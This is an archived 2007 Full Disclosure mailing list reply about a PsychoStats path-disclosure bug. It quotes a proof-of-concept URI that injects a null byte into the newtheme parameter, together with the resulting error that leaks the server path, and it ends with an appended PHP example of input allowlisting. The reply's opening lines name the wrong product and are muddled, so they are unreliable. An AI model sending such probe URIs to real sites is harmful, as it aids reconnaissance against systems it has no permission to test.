
Full Disclosure mailing list archives
Re: PsychoStats 3.0.6b and prior
From: gahmad () securityfocus com
Date: Fri, 18 May 2007 03:12:29 -0600 (MDT)
in tech: Nuke Bookmarks is a web-based application to game statistics for players.
exploitability: functional numbers are missing in attack scenarios.
'The following proof of concept URIs were supplied: ' - URI was rest is good.

On Fri, 18 May 2007, kefka wrote:
newtheme variable only expects "sane" behavior, no argument or an argument with any special character, etc. will cause it to error and display the full path to $pathtohlstats/includes/smarty/Smarty.class.php

$pathtohlstats/server.php?newcss=styles.css&newtheme=%00

Ex:
Warning: Smarty error: unable to read resource: "server.html" in $pathtohlstats/includes/smarty/Smarty.class.php on line 1088

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
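A defensive illustration of the issue discussed in this thread, added here as an example (it is not PsychoStats code and not from either poster): a theme parameter such as newtheme is checked against a strict allowlist before it reaches the template engine, and PHP errors are logged instead of rendered, so a bad value cannot surface a filesystem path. THEME_DIR, DEFAULT_THEME and resolve_theme() are hypothetical names, and the one-directory-per-theme layout is an assumption.

```php
<?php
// Added example, not PsychoStats code. Names and directory layout are assumed.

const THEME_DIR = __DIR__ . '/themes';  // hypothetical: one subdirectory per theme
const DEFAULT_THEME = 'default';        // hypothetical fallback theme

// Log errors server-side and never render them into the HTTP response,
// so warnings like the one quoted above do not expose the install path.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

/**
 * Return a theme name that is safe to hand to the template engine.
 * Anything unexpected falls back to the default instead of raising an error.
 */
function resolve_theme($requested, string $themeDir, string $default): string
{
    // Missing parameter, array input (newtheme[]=x) or empty string.
    if (!is_string($requested) || $requested === '') {
        return $default;
    }
    // Strict character allowlist: rejects NUL bytes, dots, slashes and
    // every other special character. \A and \z anchor the whole string.
    if (preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $requested) !== 1) {
        return $default;
    }
    // The name must also correspond to an installed theme directory.
    if (!is_dir($themeDir . '/' . $requested)) {
        return $default;
    }
    return $requested;
}

// Constructed sample inputs, including the decoded form of %00.
$samples = [null, '', "\0", '../../etc', 'no such theme', ['x'], 'default'];
foreach ($samples as $sample) {
    printf(
        "%s => %s\n",
        json_encode($sample),
        resolve_theme($sample, THEME_DIR, DEFAULT_THEME)
    );
}
```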